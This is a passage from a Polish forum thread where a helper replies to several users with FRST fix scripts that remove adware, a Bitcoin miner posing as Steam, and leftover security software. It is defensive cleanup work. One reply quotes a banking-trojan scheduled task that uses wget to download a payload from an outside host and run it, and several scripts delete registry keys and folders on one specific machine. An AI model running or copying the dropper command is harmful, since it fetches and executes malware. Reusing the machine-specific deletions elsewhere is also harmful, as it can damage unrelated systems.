picasso

Podkręślę na wszelki wypadek: w pierszych logach w ogóle nie było żadnych objawów infekcji i problem z pingiem miał inną przyczynę. To dopiero potem gdzieś w czasie "Fixa" FRST przypadkowo nabyłeś adware. Jeśli chodzi o bieżącą sytuację, to usunięte obiekty pomyślnie odtworzone, ale i tak jest tu jeszcze co robić. Pozostały odpadki adware i Norton Intrnet Security. Akcja: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HomePage: Default -> hxxp://isearch.omiga-plus.com/?type=hppp&ts=1420381661&from=cor&uid=WDCXWD10EZEX-08M2NA0_WD-WMC3F281549915499 CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hppp&ts=1420381661&from=cor&uid=WDCXWD10EZEX-08M2NA0_WD-WMC3F281549915499" CHR DefaultSearchKeyword: Default -> mystartsearch CHR Extension: (PriceLuess) - C:\Users\Mikołaj\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkngfjpfofkopgcobmmjmjjonnanfjje [2015-01-04] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [Not Found] StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File R4 IOMap; \??\C:\Windows\system32\drivers\IOMap64.sys [X] C:\Program Files (x86)\Opera C:\Program Files (x86)\PriceLuess C:\Program Files (x86)\Temp C:\Program Files (x86)\XTab C:\ProgramData\9d8b341775c5ca4a C:\ProgramData\IHProtectUpDate C:\ProgramData\PriceLuess C:\ProgramData\WindowsMangerProtect C:\Users\Mikołaj\AppData\Local\Chromatic Browser C:\Users\Mikołaj\AppData\Local\Comodo C:\Users\Mikołaj\AppData\Local\Opera Software C:\Users\Mikołaj\AppData\Local\Torch C:\Users\Mikołaj\AppData\Roaming\RHEng C:\Users\Mikołaj\AppData\Roaming\mystartsearch C:\Users\Mikołaj\AppData\Roaming\omiga-plus C:\Users\Mikołaj\AppData\Roaming\Opera Software C:\Users\Administrator C:\Users\HomeGroupUser$ C:\Users\Gość C:\Windows\SysWOW64\GroupPolicy\GPT.INI RemoveDirectory: C:\found.000 RemoveDirectory: C:\found.001 RemoveDirectory: C:\found.002 RemoveDirectory: C:\Windows.old RemoveDirectory: C:\Windows.old.000 EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 3. Zastosuj Norton Removal Tool. 4. Zrób nowy log FRST z opcji Scan, zaznacz pole Addition, by pozyskać dwa logi. Dołącz też plik fixlog.txt. .

Basienkaa85, nowe raporty (wystarczy cały komplet z FRST) dostarcz już tu w temacie, by było porównanie czy w międzyczasie zaszły jakieś zmiany.

Tak, jest tu Bitcoin Miner udający "klienta Steam" i uruchamiany za pomocą Harmonogramu zadań: Task: {0E51D6D7-4258-41C6-AFD0-546DD08A9F4B} - System32\Tasks\Steam_x64-S-2-106-91 => C:\Users\Puderniczek\AppData\Roaming\NVIDIA\CODEXi\Steam [2014-12-19] () Przeprowadź następujące działania: 1. Przez Panel sterowania odinstaluj reklamiarza Pandora Service. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {0E51D6D7-4258-41C6-AFD0-546DD08A9F4B} - System32\Tasks\Steam_x64-S-2-106-91 => C:\Users\Puderniczek\AppData\Roaming\NVIDIA\CODEXi\Steam [2014-12-19] () C:\Users\Puderniczek\AppData\Roaming\NVIDIA\CODEXi StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File HKU\S-1-5-21-2794411941-477867369-3393817368-1000\...\Run: [Mobile Partner] => C:\Program Files (x86)\Huawei E5372\Huawei E5372 S3 mdf16; \??\C:\Users\Puderniczek\AppData\Local\Temp\mdf16.sys [X] S3 mvd23; \??\C:\Users\Puderniczek\AppData\Local\Temp\mvd23.sys [X] Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Hold Page jest zainstalowane w każdej przeglądarce z osobna. Akcja: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com C:\Program Files (x86)\Temp Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale rozszerzenia Adblock Plus i Gmail Notifier trzeba będzie przeinstalować. 3. W Google Chrome: - Ustawienia > karta Rozszerzenia > odinstaluj Hold Page - Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres sweet-page.com, przestaw na "Otwórz stronę nowej karty" 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Temat przenoszę do działu do działu Software. Nic tu nie wskazuje, by poblem tworzyła infekcja. Natomiast bardzo silne podejrzenie budzi McAfee. Proponuję na próbę go usunąć i sprawdzić wyniki: 1. Przez Panel sterowania odinstaluj McAfee AntiVirus Plus. Następnie zastosuj narzędzie McAfee Consumer Product Removal Tool. 2. Zresetuj system. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Wypowiedz się czy coś się zmieniło.

Problem tworzy szkodliwe rozszerzenie UddQc6Jrlr zamontowane w Firefox: FF Extension: UddQc6Jrlr - C:\Users\Mikus\AppData\Roaming\Mozilla\Firefox\Profiles\u894lesq.default-1381919056284\Extensions\{cc5be304-cd48-4ebc-bd30-67f7edeaefb7} [2014-12-29] 1. Odinstaluj stare wersje i zbędniki: Adobe Flash Player 15 ActiveX, Adobe Flash Player 15 Plugin, Adobe Reader XI (11.0.02), Adobe Shockwave Player 12.0, Akamai NetSession Interface, Java 7 Update 60, JavaFX 2.1.1, MyFreeCodec, OpenOffice.org 3.2, Opera 11.11. Instalacja najnowszych odbędzie się na końcu. 2. W Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 3. W Google Chrome: - Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres sweet-page.com, przestaw na "Otwórz stronę nowej karty". - Ustawienia > karta Ustawienia > Wygląd i zaznacz "Pokaż przycisk strony startowej" > klik w Zmień i usuń adres sweet-page.com. 4. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\...\Chrome\Extension: [ajbfjlbjonnckokbmkeiammcgkdciial] - C:\Users\Mikus\AppData\Local\Temp\tbch.crx [Not Found] URLSearchHook: HKU\S-1-5-21-1441841916-1275126410-3063703315-1000 - (No Name) - {8532a8b7-c06a-41bb-936a-8ce73e4711ed} - No File HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1441841916-1275126410-3063703315-1000\...\Run: [LightShot] => C:\Users\Mikus\AppData\Local\Skillbrains\lightshot\Lightshot.exe S4 sptd; System32\Drivers\sptd.sys [X] S3 TEAM; system32\DRIVERS\RtTeam60.sys [X] Task: {02685336-0BFF-4F6C-9E6C-F0090D9234A6} - System32\Tasks\{779689FF-CCDF-406C-8FEA-947D3EB44A46} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{153898EE-EECA-471E-8E33-C8485EA84C07}\setup.exe" -c -runfromtemp -l0x0009 -removeonly Task: {1D19BA5A-1AF6-49C5-9C64-AADA31B86051} - System32\Tasks\{43F6DD23-29A7-4548-8721-619679E9B816} => pcalua.exe -a C:\Users\Mikus\Desktop\Zumas.Revenge.v1.0.Cracked-F4CG_zolin\setup.exe -d C:\Users\Mikus\Desktop\Zumas.Revenge.v1.0.Cracked-F4CG_zolin Task: {315A49F9-4341-40A9-B27A-E2F1022DEBA4} - System32\Tasks\{9BED32EE-4706-4024-9348-209EE86B1E18} => pcalua.exe -a "C:\Users\Mikus\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6RTRKYNZ\ImageShackToolbar[1].exe" -d C:\Users\Mikus\Desktop Task: {6C1CD95D-F706-4D74-99FD-21FB14DA12A3} - System32\Tasks\{583F1885-4329-43CD-A3F1-7DF8676298E4} => pcalua.exe -a C:\Users\Mikus\Desktop\LCVM_PCDRV_US_1_03_02.exe -d C:\Users\Mikus\Desktop Task: {CBA2652D-DB9E-4137-A263-95076034F755} - System32\Tasks\{8139D3A7-823E-4BC0-861B-B67D06427267} => pcalua.exe -a "C:\Program Files\MailShare\Downloads\TurboMahjong.exe" -d "C:\Program Files\MailShare\Downloads" Task: {E60BB5C5-D662-41C9-AA00-F82E0643B292} - System32\Tasks\{B696C274-90C6-44F1-B7A1-B0C240800631} => Firefox.exe http://ui.skype.com/ui/0/6.0.0.126/pl/abandoninstall?page=tsProgressBar Task: {E7ECB289-5FD7-40E8-BCB9-440937704220} - System32\Tasks\{81A7B6CF-65DD-4029-9D27-01C43FE8F6C7} => pcalua.exe -a F:\TL-WN722N\QSS-722.exe -d F:\TL-WN722N Task: {F715FF60-032F-464E-98A9-6E369646F3CF} - System32\Tasks\{983FAF59-1059-47FC-B6E3-456798541854} => pcalua.exe -a "D:\Gry\c&c 3\CNC3.exe" -d "D:\Gry\c&c 3" C:\ProgramData\TEMP C:\Users\Mikus\AppData\Local\Temp*.html C:\Users\Mikus\AppData\Roaming\WebTest Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Adware jest zainstalowane w obu przeglądarkach indywidualnie (każda musi być czyszczona z osobna). Ponadto adware przekonwertowało Google Chrome z wersji "stabilnej" do "development" (brak limitacji instalacji rozszerzeń) i będzie wymagana kompleksowa reinstalacja tej szczególnej przeglądarki. Dodatkowo, w raporcie stoją amerykańskie serwery DNS pobierane z routera, a widzę Cię pod polskim IP na forum, co sugeruje także infekcję routera. Tcpip\Parameters: [DhcpNameServer] 148.53.81.2 148.53.130.1 148.53.46.62 Wdróż następujące operacje: 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. 2. Odinstaluj zdefektowane Google Chrome oraz zbędny Akamai NetSession Interface. Przy deinstalacji Chrome zaznacz Usuń także dane przeglądarki. Resztę dokończy mój skrypt w punkcie 3. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 4. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com SearchScopes: HKU\S-1-5-21-2371548481-2500731307-350997382-1000 -> DefaultScope {410CE52B-292E-4130-8FC8-25C25CE3AE78} URL = SearchScopes: HKU\S-1-5-21-2371548481-2500731307-350997382-1000 -> {410CE52B-292E-4130-8FC8-25C25CE3AE78} URL = SearchScopes: HKU\S-1-5-21-29074177-2114273088-3454551869-225919 -> {6A95B20D-AC62-429B-80C4-8F7230A453FE} URL = S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" C:\Program Files (x86)\BuyuNssaeve C:\Program Files (x86)\Google C:\Program Files (x86)\Smart Coupon C:\Program Files (x86)\YeoutubeAdBlocke C:\ProgramData\honnbmlkkhbafkhachmeccikobmajggh C:\Users\dkoloszc\AppData\Local\Google C:\Users\dkoloszc\AppData\Roaming\eCyber Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A95B20D-AC62-429B-80C4-8F7230A453FE}" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\Dell.PowerManager.Service /s EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 5. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 6. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Przeklej dokładnie z raportu antywirusa jak jest sformułowana detekcja (konkretna ścieżka dostępu i nazwa zagrożenia). Czy przypadkiem nie chodzi o folder SkypEmoticons? Taki widać w logu, jest to adware a nie część Skype. Natomiast w logach widać też inne odpadki adware oraz czynną infekcję - wariant VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań: Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Przeprowadź następujące operacje: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction Task: {2AA368BC-A77B-47EB-9ABD-5CEC742BDC74} - System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi Task: {8DF6F1AC-6266-46C0-A0E5-736B5F75AC67} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Task: {B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E} - System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7 Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com C:\Program Files\Probit Software C:\Program Files\unisaLees C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\17691939238860040889 C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol C:\ProgramData\APN C:\ProgramData\EpicScale C:\Users\Maciej\AppData\Roaming\Easeware C:\Users\Maciej\AppData\Roaming\SkypEmoticons EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Brakuje pliku FRST Shortcut. W Google Chrome jest wszczepione adware Unuisaloes. 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CustomCLSID: HKU\S-1-5-21-2017020554-2505807170-1683698369-1005_Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\localserver32 -> C:\DOCUME~1\Agata\USTAWI~1\Temp\dc1F7d5B5\temp\Ukraine Crisis_ Death and destruction continues in Ea (the data entry has 45 more characters). S2 24c54e38; "C:\WINDOWS\system32\rundll32.exe" "c:\Program Files\DeltaFix\DeltaFix.dll",serv S3 ALSysIO; \??\C:\DOCUME~1\Agata\USTAWI~1\Temp\ALSysIO.sys [X] S3 Tosrfcom; No ImagePath S3 TpChoice; system32\DRIVERS\TpChoice.sys [X] C:\Documents and Settings\All Users\Dane aplikacji\pbphckkhomkgbgpgcgpkpncmdmkfkbnk C:\Documents and Settings\Agata\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Preferences C:\Documents and Settings\Agata\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Local Storage\*localstorage* C:\Program Files\YOutUbeAAdBlOcke C:\Program Files\uNisaliees C:\Program Files\Unuisaloes Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38} /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 3. Zrób nowy log FRST z opcji Scan (bez Addition, ale zaznacz Shortcut). Dołącz też plik fixlog.txt.

Temat przenoszę do działu Windows 8. Nie jest to problem infekcji. Moim zdaniem to nie Opera jest bezpośrednią przyczyną. W raportach jako pierwszy podejrzany dla opisywanych efektów jawi się Kaspersky Anti-Virus (silna inwazja w systemie, intercepcja procesów).

Posty dla porządku łączę, a temat przenoszę do działu Windows XP. Nie jest to problem infekcji. 1. W Dzienniku zdarzeń jest błąd charakterystyczny dla zdegradowanego transferu dysku z DMA do PIO: System errors: ============= Error: (01/04/2015 09:16:55 PM) (Source: 0) (EventID: 9) (User: ) Description: \Device\Ide\IdePort0 Rozpocznij od wykonania instrukcji rozpisanej w ustępie Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. 2. Gdy naprawisz transfer dysku: - Zastosuj narzędzie SPTDinst, by się pozbyć tego sterownika. - Posługując się Autoruns w karcie Drivers skasuj wpisy określone jako "not found". - Odinstaluj starą wersję Avast (8.0.1497.0) i zastąp najnowszą (2015.10.0.2208): KLIK. - Zaktualizuj systemowy Internet Explorer do wersji IE8. Link w przyklejonym: KLIK. 3. Po wszystkim zrób nowy log FRST z opcji Scan (bez Addition i Shortcut) i opisz co się dzieje.

Brakuje trzeciego pliku FRST Shortcut. YAC to podejrzany program, od którego należy trzymać się z daleka. Przeczytaj moją wypowiedź tutaj: KLIK. Na czas wszystkich operacji wyłącz COMODO, gdyż może zablokować akcje (z pewnością nie pozwoli przetworzyć w całości skryptu FRST): 1. Przez Panel sterowania odinstaluj: - Adware i wątpliwy skaner: LiveVDO, VshareComplete, RegClean Pro, YAC(Yet Another Cleaner!). - Stare dziurawe wersje: Adobe Flash Player 10 ActiveX, Adobe Flash Player 15 Plugin, Adobe Reader X (10.1.12) - Polish, Gadu-Gadu 10, Java 7 Update 25, OpenOffice.org 3.2 (ten ostatni nie umie korzystać z najnowszych Java i wymagana instalacja najnowszej wersji pakietu 4.x) oraz zbędnik COMODO GeekBuddy. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120141223 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120141223 HKU\S-1-5-21-3948689686-701338284-1942790856-1000\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120141223 SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = ${SEARCH_URL}{searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = ${SEARCH_URL}{searchTerms} SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> DefaultScope {8EEAC88A-079B-4b2c-80C1-7836F79EB40A} URL = http://pl.search.yahoo.com/search?p={searchTerms}&fr=chr-comodo SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://startsear.ch/?src=sp&aff=51&cf=2b2a1120-1f77-11e1-92ca-e0cb4e49e9d8&q={searchTerms} SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> {6424EBC6-FF28-456C-B234-4F3B05A9C433} URL = http://startsear.ch/?aff=1&src=sp&cf=2b2a1120-1f77-11e1-92ca-e0cb4e49e9d8&q={searchTerms} SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> {8EEAC88A-079B-4b2c-80C1-7836F79EB40A} URL = http://pl.search.yahoo.com/search?p={searchTerms}&fr=chr-comodo BHO-x32: No Name -> {cbfb5c65-652c-3e10-9d9a-e586816d9342} -> No File Toolbar: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File Task: {669DCF2F-E074-4F10-B12E-2BA69EC45636} - \RegClean Pro No Task File Task: {BE6F370A-2822-4692-BA44-3246E748166C} - System32\Tasks\{05F53984-5AC4-42FD-BFF9-4BF874278055} => pcalua.exe -a "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" HKU\S-1-5-21-3948689686-701338284-1942790856-1000\Software\Classes\.exe: => S3 ALSysIO; \??\C:\Users\user\AppData\Local\Temp\ALSysIO64.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\LiveVDO plugin C:\Program Files (x86)\Mozilla Firefox\extensions C:\Program Files (x86)\Mozilla Firefox\plugins C:\Users\user\AppData\Roaming\eCyber C:\Users\user\AppData\Roaming\Elex-tech C:\Users\user\Downloads\yet_another_cleaner_bbs.exe Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete "HKLM\SOFTWARE\mozilla\Mozilla Firefox 3.6.8" /f Reg: reg delete "HKLM\SOFTWARE\mozilla\Mozilla Firefox 18.0" /f Reg: reg delete 